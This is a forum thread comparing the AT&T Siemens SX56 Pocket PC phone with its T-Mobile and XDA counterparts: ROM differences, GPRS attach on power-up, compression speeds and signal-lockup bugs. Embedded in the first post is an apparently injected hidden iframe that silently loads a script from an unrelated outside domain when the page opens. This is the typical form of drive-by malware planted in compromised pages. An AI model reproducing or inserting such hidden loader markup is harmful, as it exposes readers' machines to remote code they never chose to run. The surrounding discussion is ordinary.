What's different about the AT&T - Siemens Phone Edition?
Are the T-Mobile, XDA, and AT&T all the same? (ok, Lazarus, I can't be any more obvious for you.... )<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
They are not all the same there is one EXCEEDINGLY obvious and important difference...........
ME!
Seriously though, they are virtually the same hardware (of course the xda radio is tuned for 1800/900) and aside from the colors the only difference is in the radio and ROM loads.
I've been noticing a few tweaks to the ROM versions based on some feedback from others on T-Mobile / O2's.
My list of things are some of the notifications have been tweaked, ie the no signal notification is missing (thankfully).
Also, the Wireless Tools app speeds up GPRS quite a bit compared to not having it.
It seems that T-Mobile users have a big problem with going out of service areas and then coming back in and the phone not detecting signal or locking up completely. I've only had this happen twice on my SX56.
T-Mobile apps cause lots of problems, AT&T has none.
Windows Media Player 8.5 vs 8.0 on T-Mobile.
GPRS connection is partly established on reset, the connection just "turns" it on??? I know this is somehow different then the others, but I am sure Laz can expand on this a bit???
The SX56 does a GPRS attach on power up of the radio, the T-Mobile device waits unil you initiate the dial-up session. This just saves a bit of time on the SX56. Some carriers like it some do not. I like it though!
The optimization client/server combo is a nice enhancement. It definately helps out on even uncompressible stuff, to the tune of about 5 to 10Kb/s. On highly compressible files I have seen speeds of up to 700Kb/s. But again that is highly compressible stuff.
I did identify a couple of bugs around going out of caverage and coming back in. I believe I got them both fixed but they got really hard to reproduce due to the low occurence rate so I can not be 100% positive. It seemed to happen when someone has a device right on the edge of coverage. Not sure what the root cause was but HTC did address it.
We waited just long enough to get the AKU4 integrated into our ROM load so we had the updated WMP as well as some other fixes from MSFT.
It turned out rather nicely I think. We limited the applications we put on the device for a couple of reasons. One the limitation on the amount of RAM in the device and the other reason.... well I think T-Mobile can explain it better.
Not trying to make you look lazy, just know that you can't always say publicly except to maybe to build on what us not in the know might say
As for the signal lockup, see another on of the threads, I did have a lockup, but it as quite different then a T-Mobile one. The radio stack seemed to stop responding, but everything was working except recieving or sending. The signal meter even showed signal... Wierd.
